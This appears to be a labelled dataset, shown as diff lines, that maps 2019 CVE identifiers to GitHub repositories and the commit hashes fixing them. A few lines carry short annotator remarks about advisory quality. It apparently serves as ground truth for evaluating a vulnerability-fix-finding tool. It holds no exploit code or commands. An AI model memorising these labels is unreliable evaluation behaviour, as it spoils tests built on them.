+CVE-2019-10757;https://github.com/knex/knex;None:None;False;988fb243898d746a759d422762685a79eddf99ca; +CVE-2019-10760;https://github.com/commenthol/safer-eval;None:None;False;1c29f6a6e304fb650c05056e217e457a0d2cc3c5; +CVE-2019-10762;https://github.com/catfan/Medoo;None:None;False;659864b393961bf224bba1efc03b7dcbed7de533; +CVE-2019-10763;https://github.com/pimcore/pimcore;None:None;False;9182f03c80bb7f08aae4efd4a0788e2be6368d96,608ef5d81ba34d034c9b70519bbc6806ad115d68; +CVE-2019-10764;https://github.com/simplito/elliptic-php;None:None;False;15652609aa55968d56685c2a9120535ccdc00fd9; +CVE-2019-10766;https://github.com/usmanhalalit/pixie;None:None;False;9bd991021abbcbfb19347a07dca8b7e518b8abc9,747dd46a967de4e9a944c56f7597e2a2378829c6; +CVE-2019-10767;https://github.com/ioBroker/ioBroker.js-controller;None:None;False;f6e292c6750a491a5000d0f851b2fede4f9e2fda; +CVE-2019-10768;https://github.com/angular/angular.js;None:None;False;add78e62004e80bb1e16ab2dfe224afa8e513bc3,e242e9b5952edcb5c362b80e77a30379d565cf8f,726f49dcf6c23106ddaf5cfd5e2e592841db743a; +CVE-2019-10770;https://github.com/ratpack/ratpack;None:None;False;c1d4357bbc4bceb24abb156fbb471257a0177eb6,a3cbb13be1527874528c3b99fc33517c0297b6d3; +CVE-2019-10771;https://github.com/ioBroker/ioBroker.web;None:None;False;24ebb6d3714feac87570ce7a2e827fd2f91aa043; +CVE-2019-10773;https://github.com/yarnpkg/yarn;None:None;False;039bafd74b7b1a88a53a54f8fa6fa872615e90e7,8cd85c9c463fb75df0621fc256126dca169bdc3f,85d8d79892e967f6529716a05cb4a9bc9769f811,ef69693037865be3389ac470de8a4891ec4faf18,35a884ec448b4cad193feb08aa9ff20e7397894d,752ce39e0de09df42f17dc982b18f91c8130e613,cefe4c529816f94cfefbb78c1b0d16d7da895b64; +CVE-2019-10774;https://github.com/mikehaertl/php-shellcommand;None:None;False;8d98d8536e05abafe76a491da87296d824939076,c2ef7dbdb38a0a477394975097655c00adec97c4; +CVE-2019-10776;https://github.com/kellyselden/git-diff-apply;None:None;False;106d61d3ae723b4257c2a13e67b95eb40a27e0b5; +CVE-2019-10777;https://github.com/awspilot/cli-lambda-deploy;None:None;False;0985a18bffb265817bc84836c9a65f2bb04a51ac; +CVE-2019-10778;https://github.com/guybedford/devcert;None:None;False;571f4e6d077f7f21c6aed655ae380d85a7a5d3b8; +CVE-2019-10780;https://github.com/inukshuk/bibtex-ruby;None:None;False;14406f4460f4e1ecabd25ca94f809b3ea7c5fb11; +CVE-2019-10781;https://github.com/schema-inspector/schema-inspector;None:None;False;345a7b2eed11bb6128421150d65f4f83fdbb737d; +CVE-2019-10787;https://github.com/Turistforeningen/node-im-resize;None:None;False;de624dacf6a50e39fe3472af1414d44937ce1f03; +CVE-2019-10792;https://github.com/diegohaz/bodymen;None:None;False;5d52e8cf360410ee697afd90937e6042c3a8653b; +CVE-2019-10793;https://github.com/rhalff/dot-object;None:None;False;f76cff5fe6d01d30ce110d8f454db2e5bd28a7de; +CVE-2019-10795;https://github.com/remy/undefsafe;None:None;False;f272681b3a50e2c4cbb6a8533795e1453382c822; +CVE-2019-10797;https://github.com/wso2/transport-http;None:None;False;4a4dc99c7b259646ee5e23b7aaa7c3a8bac959c1; my bad i used two times 6.3.1 +CVE-2019-10799;https://github.com/eiskalteschatten/compile-sass;None:None;False;d9ada7797ff93875b6466dea7a78768e90a0f8d2; +CVE-2019-10806;https://github.com/vega/vega;None:None;False;27881f21af7d51fe0dc2fdbd92eabd34974310f1,8f33a0b5170d7de4f12fc248ec0901234342367b; +CVE-2019-10867;https://github.com/pimcore/pimcore;None:None;False;38a29e2f4f5f060a73974626952501cee05fda73; +CVE-2019-10874;https://github.com/bolt/bolt;None:None;False;127434d79990b54abfb3e830243deaf725baa4de,91187aef36363a870d60b0a3c1bf8507af34c9e4; +CVE-2019-10904;https://github.com/roundup-tracker/roundup;None:None;False;a2edc3cba0b5d34005114f6da0251bd9ac2837df; +CVE-2019-10912;https://github.com/symfony/symfony;None:None;False;4fb975281634b8d49ebf013af9e502e67c28816b,d140648929b296ee5b27cbcf407672b3ae3980dc,4b18b32133d889cce605aa15242251bf485895de,b224d4f012dbd8c53cecb22254642e7e1fb70f40,d77e44569785329702ea55ead8938776080989b7; +CVE-2019-11016;https://github.com/Elgg/Elgg;None:None;False;482d19801fc0149f8605604415e90e69333c6347,bd194d1baa89ca271411b74569bcd806b9fa62e6; +CVE-2019-11082;https://github.com/dkpro/dkpro-core;None:None;False;6bdca97de39983083e400cb8715c019fe508b912,ceb749a82e15dc538793ae3fa0c06826dadbde24,0d7048e7130ddc901445281b777207d97f74e664,b7ab1ed62466fbbb852f8c97bdb888e2be10c2eb,0371975bab12f8f94e2f3c655922a360c76b7519,9c4c5d579355d2f9c5dc16eade0bc046be233035; +CVE-2019-11244;https://github.com/kubernetes/kubernetes;None:None;False;730bc968b95842022c4c81d607bf6411b459a675,f228ae3364729caed59087e23c42868454bc3ff4,b83756b3181f464720bfb468a171a58fc110c3e8,f6cee7a330a3b6f67701da4d0e76e65aa02a9159,4ccdc8b71b2790b2853b3ac43cdda623f8b22b12,6e4df6a7f27ecadbdec06fe92d915faabee33300,211b1ada57ae0b85dd08c4c353c90305fa1f14c9,8bebb336d0dfa07c70f92ca81fd88986d2a3192b; fixed version is vulnerable +CVE-2019-11245;https://github.com/kubernetes/kubernetes;None:None;False;7d58a4985dc157952a4f38f544a80ce4bf019471,9bba83f2c2e3a2432943fc2ee987cb7f264d9449,6c1b3b4f623b35a11a298194810078f4093c13f2,02026415cdc49b4ceb1b70e0410a93b57885851e,78254d555a2958483780818ac83f899ff9aa6296,91e593546c8396d6b764ff0832483411f5a3f3d3; example-case of uselesness of prospector, the issue mentioned in the advisory leads to all the right commits +CVE-2019-11269;https://github.com/spring-projects/spring-security-oauth;None:None;False;cb714f4cee45ce2807320ded38ed0bee846f2397,346bb74d28d7292afa30ce538c68cabc51d91777,1434dcf0c731dd1ee50d52520b1e24c15eb1f009,f769ff98c7b0c7aba42dd67538f6912c8e0d2ef7; +CVE-2019-11272;https://github.com/spring-projects/spring-security;None:None;False;b2d4fec3617c497c5a8eb9c7e5270e0c7db293ee; +CVE-2019-11289;https://github.com/cloudfoundry/gorouter;None:None;False;b1b5c44e050f73b399b379ca63a42a2c5780a83f; +CVE-2019-11325;https://github.com/symfony/symfony;None:None;False;d446d7733abd8807ff43e7a689065e6ebc48e32a,0524868cbf3d3a36e0af804432016d5a6d98169a; +CVE-2019-11328;https://github.com/hpcng/singularity;None:None;False;b4dcb0e4d77baa1c7647a4a5705ea824bb4e0dca; vulnerable tag is fixed +CVE-2019-11358;https://github.com/jquery/jquery;None:None;False;753d591aea698e57d6db58c9f722cd0808619b1b; +CVE-2019-11405;https://github.com/OpenAPITools/openapi-generator;None:None;False;cce35d75a4e69d09ec81ff1ece637d39b0f6f00e,54d9c19c7707285d7b3f9749762a5cf1a9c4336c; +CVE-2019-11458;https://github.com/cakephp/cakephp;None:None;False;1a74e798309192a9895c9cedabd714ceee345f4e,c25b91bf7c72db43c01b47a634fd02112ff9f1cd,81412fbe2cb88a304dbeeece1955bc0aec98edb1,2434f9ba4740759bf10947fbb5d3ebccce8e5cb9; +CVE-2019-11470;https://github.com/ImageMagick/ImageMagick;None:None;False;e3cdce6fe12193f235b8c0ae5efe6880a25eb957,fedaa752e53f37258139fcc8802aad426f111bc0; +CVE-2019-11512;https://github.com/contao/contao;None:None;False;87d92f823b08b91a0aeb522284537c8afcdb8aba; +CVE-2019-11514;https://github.com/flarum/core;None:None;False;66607a56749339d50620b049701ad4d6a4dafbd7; +CVE-2019-11767;https://github.com/phpbb/phpbb;None:None;False;dc5a167c429a3813d66b0ae3d14242650466cac6; +CVE-2019-11768;https://github.com/phpmyadmin/phpmyadmin;None:None;False;c1ecafc38319e8f768c9259d4d580e42acd5ee86; +CVE-2019-11777;https://github.com/eclipse/paho.mqtt.java;None:None;False;a0bbf1e7da158ae191582f032343c6171e6a0b44; +CVE-2019-11808;https://github.com/ratpack/ratpack;None:None;False;7b2f09eeeba1e460ad8702930a8a8933a2dbe1e9,f2b63eb82dd71194319fd3945f5edf29b8f3a42d; +CVE-2019-12041;https://github.com/jonschlinkert/remarkable;None:None;False;30e2bf05c12bbb12f04ffa0544df475d1ccc18d2,287dfbf22e70790c8b709ae37a5be0523597673c; +CVE-2019-12086;https://github.com/FasterXML/jackson-databind;None:None;False;d30f036208ab1c60bd5ce429cb4f7f1a3e5682e8,efc3c0d02f4743dbaa6d1b9c466772a2f13d966b,dda513bd7251b4f32b7b60b1c13740e3b5a43024; +CVE-2019-12203;https://github.com/silverstripe/silverstripe-framework;None:None;False;a6763298fef6b876597c3170c7aef710a62bb55c,eccfa9b10d246d741de2fa83d502339d45068983,569237c0f4d16ac6f927aeb0ed8c9b8787490080,a86093fee6398881889d6d330a15f7042be25bff; fixed version is vulnerable +CVE-2019-12245;https://github.com/silverstripe/silverstripe-assets;None:None;False;1df69c4a4d6258ebe5c4030fd7c78c6a75e94167,73e0cc69dc499c24aa706af9eddd8a2db2ac93e0; wrong advisory version +CVE-2019-12277;https://github.com/blogifierdotnet/Blogifier;None:None;False;3e2ae11f6be8aab82128f223c2916fab5a408be5; +CVE-2019-12308;https://github.com/django/django;None:None;False;c238701859a52d584f349cce15d56c8e8137c52b,deeba6d92006999fee9adfbd8be79bf0a59e8008,afddabf8428ddc89a332f7a78d0d21eaf2b5a673,09186a13d975de6d049f8b3e05484f66b01ece62; +CVE-2019-12313;https://github.com/dollarshaveclub/shave;None:None;False;1876911e423c00fdda643ef724d956b3d324d5c2,da7371b0531ba14eae48ef1bb1456a3de4cfa954; +CVE-2019-12387;https://github.com/twisted/twisted;None:None;False;8a473397d5cdecff38b95a94fc7fc75dd06217dc,6c61fc4503ae39ab8ecee52d10f10ee2c371d7e2; The nvd advisory links a commit having the cve in the message but the oldest tag is twisted-19.7.0 +CVE-2019-12402;https://github.com/apache/commons-compress;None:None;False;4ad5d80a6272e007f64a6ac66829ca189a8093b9; +CVE-2019-12404;https://github.com/apache/jspwiki;None:None;False;d71ecf657ef3366f1790d9f09364812c78f7f8c2; +CVE-2019-12405;https://github.com/apache/trafficcontrol;None:None;False;f780aff77a52d52a37b4d1cc3e8e801c0b557356,54f105dfd6069945ec12c89d965532e6f5185935; +CVE-2019-12407;https://github.com/apache/jspwiki;None:None;False;f43ac386c8cd3e5fed7069e8fc8286668c86b5f8; +CVE-2019-12418;https://github.com/apache/tomcat;None:None;False;a91d7db4047d372b2f12999d3cf2bc3254c20d00,1fc9f589dbdd8295cf313b2667ab041c425f99c3,bef3f40400243348d12f4abfe9b413f43897c02b; +CVE-2019-12419;https://github.com/apache/cxf;None:None;False;6bf89927d3e07197d49453b00d673eadce696cf9,db6069667708a59c75a785f310d4a2df3698122c,661c271f4890b05896eee5de9cb8fb503fb3bccb; +CVE-2019-12422;https://github.com/apache/shiro;None:None;False;44f6548b97610cdf661976969d5735c0be14a57b,a8018783373ff5e5210225069c9919e071597d5e; +CVE-2019-12423;https://github.com/apache/cxf;None:None;False;8b40fdba289c62f4defae51c1f76860f0159c441,2de7e14eb95626fffef6f61365186de9a1c9de3d; +CVE-2019-12616;https://github.com/phpmyadmin/phpmyadmin;None:None;False;015c404038c44279d95b6430ee5a0dddc97691ec; +CVE-2019-12617;https://github.com/silverstripe/silverstripe-framework;None:None;False;8b7063a8e2773e2bbec3cabf94ed86e11f607071,5af205993d24b4bafc00dea94efc2c31305bca83; fixed version is vulnerable +CVE-2019-12741;https://github.com/hapifhir/hapi-fhir;None:None;False;8f41159eb147eeb964cad68b28eff97acac6ea9a; +CVE-2019-12748;https://github.com/TYPO3/TYPO3.CMS;None:None;False;4c003f80b8b25def173268b8b069446c4fcc313a,96105753aa6a61397ea47dc6fbe23f1f994fe32e,6dcbf981f89bed5826e3e284e0441d8e3a50bae6; +CVE-2019-12781;https://github.com/django/django;None:None;False;54d0f5e62f54c29a12dd96f44bacd810cbe03ac8,77706a3e4766da5d5fb75c4db22a0a59a28e6cd6,32124fc41e75074141b05f10fc55a4f01ff7f050,1e40f427bb8d0fb37cc9f830096a97c36c97af6f; +CVE-2019-12814;https://github.com/FasterXML/jackson-databind;None:None;False;5f7c69bba07a7155adde130d9dee2e54a54f1fa5; +CVE-2019-13127;https://github.com/jgraph/mxgraph;None:None;False;76e8e2809b622659a9c5ffdc4f19922b7a68cfa3; +CVE-2019-13135;https://github.com/ImageMagick/ImageMagick;None:None;False;cdb383749ef7b68a38891440af8cc23e0115306d; +CVE-2019-13173;https://github.com/npm/fstream;None:None;False;6a77d2fa6e1462693cf8e46f930da96ec1b0bb22; +CVE-2019-13209;https://github.com/rancher/rancher;None:None;False;0ddffe484adccb9e37d9432e8e625d8ebbfb0088; +CVE-2019-13295;https://github.com/ImageMagick/ImageMagick;None:None;False;a7759f410b773a1dd57b0e1fb28112e1cd8b97bc; +CVE-2019-13574;https://github.com/minimagick/minimagick;None:None;False;4cd5081e58810d3394d27a67219e8e4e0445d851; +CVE-2019-13644;https://github.com/firefly-iii/firefly-iii;None:None;False;def307010c388c4e92d7066671ad62e477cc087a; advisory link is a first uncomplete fix +CVE-2019-14262;https://github.com/drewnoakes/metadata-extractor-dotnet;None:None;False;c9a8a9ac4376725084bd7c3c11af50c74cf58d44,3142e5e6a95f2760ace1d2fdd9d50a97eb1c0e23; +CVE-2019-14280;https://github.com/craftcms/cms;None:None;False;7e7b9756da942d70b930a5e9a8ea4767f3920d00,a3844e019bbc3c67a2f9ba581a758d785efa9e26; +CVE-2019-14537;https://github.com/YOURLS/YOURLS;None:None;False;9e36c67b01b932a41f0834d7896c7ba8383e9f07; +CVE-2019-14540;https://github.com/FasterXML/jackson-databind;None:None;False;d4983c740fec7d5576b207a8c30a63d3ea7443de; +CVE-2019-14668;https://github.com/firefly-iii/firefly-iii;None:None;False;3ad4e04e2ae50e60564b60b68dfac083e5684882; +CVE-2019-14669;https://github.com/firefly-iii/firefly-iii;None:None;False;2ddf48f15cbdbb475221c299872420f625c3bc3f; +CVE-2019-14671;https://github.com/firefly-iii/firefly-iii;None:None;False;e80d616ef4397e6e764f6b7b7a5b30121244933c; +CVE-2019-14672;https://github.com/firefly-iii/firefly-iii;None:None;False;8717f469b10e9f7e1547c6f70f7d24e1359d28d4; +CVE-2019-14751;https://github.com/nltk/nltk;None:None;False;f59d7ed8df2e0e957f7f247fe218032abdbe9a10; +CVE-2019-14806;https://github.com/pallets/werkzeug;None:None;False;00bc43b1672e662e5e3b8cecd79e67fc968fa246; +CVE-2019-14837;https://github.com/keycloak/keycloak;None:None;False;9a7c1a91a59ab85e7f8889a505be04a71580777f; +CVE-2019-14838;https://github.com/wildfly/wildfly-core;None:None;False;2d527803dc10add8806fa0dd66f409dc511f92ec,131fa6880ae1523fac9e96df54dc394b63b0eed3,80e18b46f73f9d061d4150c66e6dc2fc1fd0bc41; had to look for tags manually (commits have no tags) +CVE-2019-14862;https://github.com/knockout/knockout;None:None;False;7e280b2b8a04cc19176b5171263a5c68bda98efb; +CVE-2019-14863;https://github.com/angular/angular.js;None:None;False;f33ce173c90736e349cf594df717ae3ee41e0f7a; +CVE-2019-14892;https://github.com/FasterXML/jackson-databind;None:None;False;819cdbcab51c6da9fb896380f2d46e9b7d4fdc3b,41b7f9b90149e9d44a65a8261a8deedc7186f6af; +CVE-2019-14893;https://github.com/FasterXML/jackson-databind;None:None;False;998efd708284778f29d83d7962a9bd935c228317; +CVE-2019-14933;https://github.com/bagisto/bagisto;None:None;False;6a4cb016c4b1fa218c86b19b944fe88cab89c82d,747f2147396acb5e9477431e6847a7cf82e62614,e88bf10c55ee6ad89c0a81ad539ca9695aaa9999,09d6afc72aa055a389139f14e3d643927cea7501,61fd02ed576c4588dd72757da8e59fe1697a76e9,1e6579bedff68ab22f9160c2f4a0b7f4cbc9de60,d8d645eb4122a951ac89c3cbe6086b33a4707a2a,8cfcf3d4844bbc58623c02fab6da9bb1a1d619d3,6c74b2ca4269ac62f051d0a5a50a3ec8070c988c,c7482f576ec79b3c03119239b35c8b4c75a8e0a3,5c94a8a21fb0c79886975e4c489eecc131a9939f,1033bd8d315c47b95042a16b5b3b79fb17a796e5,82e56334c29d40ae66b9f74415962d8cdec86fcd,2df1a84191eb0cb67c5514e4fbbe936ef6883067,dadbf2bd6aa32c66a74028643c72a9e71b7fc314; +CVE-2019-14980;https://github.com/ImageMagick/ImageMagick;None:None;False;c5d012a46ae22be9444326aa37969a3f75daa3ba; +CVE-2019-15062;https://github.com/Dolibarr/dolibarr;None:None;False;18eb2a83fe7c2d01bdb34cceec389a6f9541e1f6,9692ea5faf2ef69bec7328feda1a23092ce55143,d21e5571007d2052a6b5f80a67b6f4cac693584a; vulnerable tag is fixed +CVE-2019-15477;https://github.com/jooby-project/jooby;None:None;False;27b4af283de1a2c2a6b0530039b46eef75ddf655,34856a738829d8fedca4ed27bd6ff413af87186f,395dab7e80474ac0c2c32d81f61cda2c8331a46b; +CVE-2019-15481;https://github.com/kevinpapst/kimai2;None:None;False;a0e8aa3a435717187fb12210242dab1b7c97ff3f; +CVE-2019-15482;https://github.com/SLMNBJ/selectize-plugin-a11y;None:None;False;99c14f7644fdfc815625d7b54829e6c2dca31a8b,927d81e9ea86acac1724d57b2ce9f3c962fd34c4; +CVE-2019-15483;https://github.com/bolt/bolt;None:None;False;7910ea8443377bf661ac49a80015eb25f69cdfd5,45780faa7ee5263a5a5ca4cfe102830ef244b06a; +CVE-2019-15484;https://github.com/bolt/bolt;None:None;False;2634a56c0db25a6a7e917a78ab8f9fc430f03a51,520c4578acfd0193b08cabd924598e6dd0edf98f; +CVE-2019-15485;https://github.com/bolt/bolt;None:None;False;1ef623734b555fc5dbcd6d735cf2ecf8b2d22cd1,bd7e9393f24ef162e354b28b82b85d1865d6c0e8; +CVE-2019-15486;https://github.com/ierror/django-js-reverse;None:None;False;a3b57d1e4424e2fadabcd526d170c4868d55159c,78d6aff2276f2d341f643b095515f8aaba5e67c2; +CVE-2019-15532;https://github.com/gchq/CyberChef;None:None;False;01f0625d6a177f9c5df9281f12a27c814c2d8bcf; +CVE-2019-15587;https://github.com/flavorjones/loofah;None:None;False;0c6617af440879ce97440f6eb6c58636456dc8ec,e323a776dd2755a837a67895eaa3cdae44495254; wrong cve id in linked issue... +CVE-2019-15599;https://github.com/pkrumins/node-tree-kill;None:None;False;ff73dbf144c4c2daa67799a50dfff59cd455c63c,deee138a8cbc918463d8af5ce8c2bec33c3fd164; +CVE-2019-15608;https://github.com/yarnpkg/yarn;None:None;False;34efd23305b9da701aae96f29302b71a5a0ea2e6,fa746451eeae79ec35e87bbec14576d6831984fe; +CVE-2019-15657;https://github.com/mysticatea/eslint-utils;None:None;False;08158db1c98fd71cf0f32ddefbc147e2620e724c; +CVE-2019-15658;https://github.com/voxpelli/node-connect-pg-simple;None:None;False;df61c9507f804ba72803e4f567c3cbcfa0a9d7e1; +CVE-2019-15782;https://github.com/webtorrent/webtorrent;None:None;False;7e829b5d52c32d2e6d8f5fbcf0f8f418fffde083,22546df6d9ba9ca4523142d98b5e70f6db213f3e,cdf1159cc0227b1f85c4a52263cbd33bc4ed5242,9029557ca3d22faef67315f8ed33df295ce6d59e; +CVE-2019-16060;https://github.com/airbrake/airbrake-ruby;None:None;False;d29925e7838031bf7dea7016b22de52532503796,45b1306590c345ed798f3290d32eb1deb38b9945; +CVE-2019-16097;https://github.com/goharbor/harbor;None:None;False;290da4dc7bd11532800c13cfa125b300231f76f4,1559c8ccd19ac6bd128d2cc91c4cc0b3ac4b35a2,7d151946e0e2d2b23ddb8f6ca2d16a9413acf7d9,b6db8a8a106259ec9a2c48be8a380cb3b37cf517; +CVE-2019-16145;https://github.com/padrino/padrino-contrib;None:None;False;85e087ef40cbc3c6244d5301b6d7da63ba1ade20,662616162265a74da5a35b55c10f85d8168fc635; commit has no tags, the commits appear in zero tags so we filter them out +CVE-2019-16197;https://github.com/Dolibarr/dolibarr;None:None;False;cabbdfc650a1f2b4f0fe04bf29bab0b3cfc2ee63; +CVE-2019-16317;https://github.com/pimcore/pimcore;None:None;False;6ee5d8536d0802e377594cbe39083e822710aab9; +CVE-2019-16318;https://github.com/pimcore/pimcore;None:None;False;732f1647cc6e0a29b5b1f5d904b4d726b5e9455f; +CVE-2019-16335;https://github.com/FasterXML/jackson-databind;None:None;False;73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db; +CVE-2019-16403;https://github.com/bagisto/bagisto;None:None;False;4a2efc8eee0b8cc2ce807288f06a843c8e10701b,06aa4dd6bf1569ec2f76fe49fb4cf177e24539e0,40ebb3a0c43ca8754ff5be46afdeb298ee91bd95; fixed version is vulnerable +CVE-2019-16676;https://github.com/heartcombo/simple_form;None:None;False;8c91bd76a5052ddf3e3ab9fd8333f9aa7b2e2dd6; +CVE-2019-16761;https://github.com/simpleledger/slp-validate.js;None:None;False;50ad96c2798dad6b9f9a13333dd05232defe5730; +CVE-2019-16762;https://github.com/simpleledger/slpjs;None:None;False;ac8809b42e47790a6f0205991b36f2699ed10c84; +CVE-2019-16763;https://github.com/mpetroff/pannellum;None:None;False;cc2f3d99953de59db908e0c6efd1c2c17f7c6914; +CVE-2019-16766;https://github.com/labd/wagtail-2fa;None:None;False;a6711b29711729005770ff481b22675b35ff5c81; +CVE-2019-16768;https://github.com/Sylius/Sylius;None:None;False;fd43ee5321668c0777aa2c023a88a613bd2b2d58,8b68ff784d16930c86266b0ab93d06ba9fd12a19,19b2fe4a6cdb2186489221ea8b5e5628c8223286,51dd1fe1a97b116507d1651591f91413411f1a86,e9bd800c25ed4a4f3580054df7019e965c57c4f5; +CVE-2019-16769;https://github.com/yahoo/serialize-javascript;None:None;False;16a68ab53d9626fc7c942b48a1163108fcd184c8; +CVE-2019-16770;https://github.com/puma/puma;None:None;False;98a1f03e5ebe40cf56b65b0bf60adf97057e0eaf,6baa4d8e1c88f2e4db2918df48416a5c49feec40,06053e60908074bb38293d4449ea261cb009b53e; +CVE-2019-16771;https://github.com/line/armeria;None:None;False;b597f7a865a527a84ee3d6937075cfbb4470ed20; +CVE-2019-16772;https://github.com/commenthol/serialize-to-js;None:None;False;181d7d583ae5293cd47cc99b14ad13352875f3e3,d0234d3a3cea6edaeb2c22df0d359164967234a2; +CVE-2019-16774;https://github.com/PHPSocialNetwork/phpfastcache;None:None;False;82a84adff6e8fc9b564c616d0fdc9238ae2e86c3,c4527205cb7a402b595790c74310791f5b04a1a4,34d680b18e79e9d7f0874a5a06d23371dc326b26,17f77676adfe1e0b24a139dcaa0586d283fbfcef; +CVE-2019-16778;https://github.com/tensorflow/tensorflow;None:None;False;db4f9717c41bccc3ce10099ab61996b246099892; +CVE-2019-16779;https://github.com/excon/excon;None:None;False;ccb57d7a422f020dc74f1de4e8fb505ab46d8a29; +CVE-2019-16782;https://github.com/rack/rack;None:None;False;7fecaee81f59926b6e1913511c90650e76673b38,3232f9370d099e784a16c01d32e8a2da4a953f18,15da2e5d95228d0b3fcdb38b2a562efc333402f0,1a532d13eee9d5546349b5253a204187773de151,b9565a90eea77960e552e3c86b0adb83ab034726,368effdbeca7955f4e46ea51bfb2d647bc79aa6b,d49aa811d6c8fe109c7fc5ca9bddb3d9f7eba796,3e9cb660cc8bf9543b134b6f3ca35aadfe4e0611,442dba2362558e4a7a3e39d437b95d81f2479b31,3ab0277cd129f15059662451718048bcf23cb5d1,7237b6661ad98c1dac6ad799192262697e1a3559,511f809e80c3264af3a26d485a5137ac28f08ebe,5b1cab667270d7ad1a4d2088adf5ff4eb9845496,1e96e0f197777458216bb3dfdbcce57a0bbba0c5,3ba123d278f1085ba78fc000df954e507af2d622,dc45a06b339c707c1f658c123ec7216151878f7a,73a5f79f6854eed81ecc3e5fb9f8154e967ccc49,4e322629e0c6698c75a3fb541a42571f8543c34c,1c7e3b259f0741c869dcfbabeb3e0670c4d3f848,2b205ed5a047d9e50a13bb7a411bc48745b515ec,bb3d486644755b2e0c7824b3910db1a83c98fcd2,77f3aab73089abe518f62c46268b104bacd7114b,83d4bd12c7e88455d21230bc24ec3a543654e2aa; +CVE-2019-16784;https://github.com/pyinstaller/pyinstaller;None:None;False;42a67148b3bdf9211fda8499fdc5b63acdd7e6cc; +CVE-2019-16785;https://github.com/Pylons/waitress;None:None;False;8eba394ad75deaf9e5cd15b78a3d16b12e6b0eba; +CVE-2019-16786;https://github.com/Pylons/waitress;None:None;False;f11093a6b3240fc26830b6111e826128af7771c3; +CVE-2019-16789;https://github.com/Pylons/waitress;None:None;False;11d9e138125ad46e951027184b13242a3c1de017; +CVE-2019-16792;https://github.com/Pylons/waitress;None:None;False;575994cd42e83fd772a5f7ec98b2c56751bd3f65; +CVE-2019-16869;https://github.com/netty/netty;None:None;False;39cafcb05c99f2aa9fce7e6597664c9ed6a63a95,017a9658c97ff1a1355c31a6a1f8bd1ea6f21c8d; +CVE-2019-16884;https://github.com/opencontainers/runc;None:None;False;3e425f80a8c931f88e6d94a8c831b9d5aa481657,331692baa7afdf6c186f8667cb0e6362ea0802b3; +CVE-2019-16942;https://github.com/FasterXML/jackson-databind;None:None;False;328a0f833daf6baa443ac3b37c818a0204714b0b,54aa38d87dcffa5ccc23e64922e9536c82c1b9c8,9593e16cf5a3d289a9c584f7123639655de9ddac; +CVE-2019-16943;https://github.com/FasterXML/jackson-databind;None:None;False;328a0f833daf6baa443ac3b37c818a0204714b0b,54aa38d87dcffa5ccc23e64922e9536c82c1b9c8,9593e16cf5a3d289a9c584f7123639655de9ddac; +CVE-2019-17206;https://github.com/frostming/rediswrapper;None:None;False;2751f6ff86e3f90c9e14b8b8acc8ef02c86987e1,f24212589b568c9f9ae11d4bf504f42303b341d5,748f60bafd857c24f65683426f665350e2c3f91b; +CVE-2019-17223;https://github.com/Dolibarr/dolibarr;None:None;False;c7736dde41826ac6eca3e838e57eab2f0304e256,8645fd8946eab2d2edb39ba7a3cf59282fa8b994; commit has no tags +CVE-2019-17267;https://github.com/FasterXML/jackson-databind;None:None;False;191a4cdf87b56d2ddddb77edd895ee756b7f75eb; +CVE-2019-17359;https://github.com/bcgit/bc-java;None:None;False;33a8e4aa07b21a8bcf5a582446664485f5f081b2,b1bc75254f5fea633a49a751a1a7339056f97856; +CVE-2019-17383;https://github.com/dspinhirne/netaddr-rb;None:None;False;3aac46c00a36e71905eaa619cb94d45bff6e3b51,f9639bd6e1d920cc46ff56ec11981536cb371c6b; +CVE-2019-17426;https://github.com/Automattic/mongoose;None:None;False;f3eca5b94d822225c04e96cbeed9f095afb3c31c,f88eb2524b65a68ff893c90a03c04f0913c1913e; +CVE-2019-17496;https://github.com/craftcms/cms;None:None;False;0ee66d29281af2b6c4f866e1437842c61983a672; +CVE-2019-17513;https://github.com/ratpack/ratpack;None:None;False;efb910d38a96494256f36675ef0e5061097dd77d; +CVE-2019-17531;https://github.com/FasterXML/jackson-databind;None:None;False;b5a304a98590b6bb766134f9261e6566dcbbb6d0; +CVE-2019-17541;https://github.com/ImageMagick/ImageMagick;None:None;False;39f226a9c137f547e12afde972eeba7551124493; +CVE-2019-17554;https://github.com/apache/olingo-odata4;None:None;False;c3f982db3d97e395d313ae8f231202bb2139882c,5948974ad28271818e2afe747c71cde56a7f2c63; +CVE-2019-17563;https://github.com/apache/tomcat;None:None;False;e19a202ee43b6e2a538be5515ae0ab32d8ef112c,1ecba14e690cf5f3f143eef6ae7037a6d3c16652,ab72a106fe5d992abddda954e30849d7cf8cc583; +CVE-2019-17569;https://github.com/apache/tomcat;None:None;False;b191a0d9cf06f4e04257c221bfe41d2b108a9cc8,959f1dfd767bf3cb64776b44f7395d1d8d8f7ab3,3c295d913e1d82ce25b4ad66c800313994f4e530,060ecc5eb839208687b7fcc9e35287ac8eb46998; +CVE-2019-17592;https://github.com/adaltas/node-csv-parse;None:None;False;b9d35940c6815cdf1dfd6b21857a1f6d0fd51e4a; +CVE-2019-17632;https://github.com/eclipse/jetty.project;None:None;False;cf0df6e3ffdcd64d607a35488edb5b0b75350d33,ba1fe2826d49c52f82b49bb32737a361519c0479,9e40fc9a6fbe93850233b7f03f048b1272530942; another case of "introduced by" on debian security tracker +CVE-2019-18622;https://github.com/phpmyadmin/phpmyadmin;None:None;False;ff541af95d7155d8dd326f331b5e248fea8e7111; +CVE-2019-18656;https://github.com/pimcore/pimcore;None:None;False;ca036e9f86bb5cdb3dac0930ec131e5f35e26c5f; +CVE-2019-18841;https://github.com/ankane/chartkick.js;None:None;False;3f833c2b229db140295b44074fef56428e0a8b91,b810936bbf687bc74c5b6dba72d2397a399885fa; +CVE-2019-18848;https://github.com/nov/json-jwt;None:None;False;ada16e772906efdd035e3df49cb2ae372f0f948a; +CVE-2019-18857;https://github.com/darylldoyle/svg-sanitizer;None:None;False;51ca4b713f3706d6b27769c6296bbc0c28a5bbd0; +CVE-2019-18874;https://github.com/giampaolo/psutil;None:None;False;7d512c8e4442a896d56505be3e78f1156f443465; +CVE-2019-18886;https://github.com/symfony/symfony;None:None;False;7bd4a92fc9cc15d9a9fbb9eb1041e01b977f8332,3ae3094a18a649d00d12e025da36007b5931b8d0,5ac07633314f59033dd6f975c199da2822b37533,bcfc282d42798860ac6a81c062ee6ff2ce65c80f; introduced by, but it should find also the second +CVE-2019-18887;https://github.com/symfony/symfony;None:None;False;d41bd42ad5d51e0f4d24259ec2814ccb294c3ba2,cccefe6a7f12e776df0665aeb77fe9294c285fbb,010213408e61620eb21ba5e5ef3bfba14a4ff689; 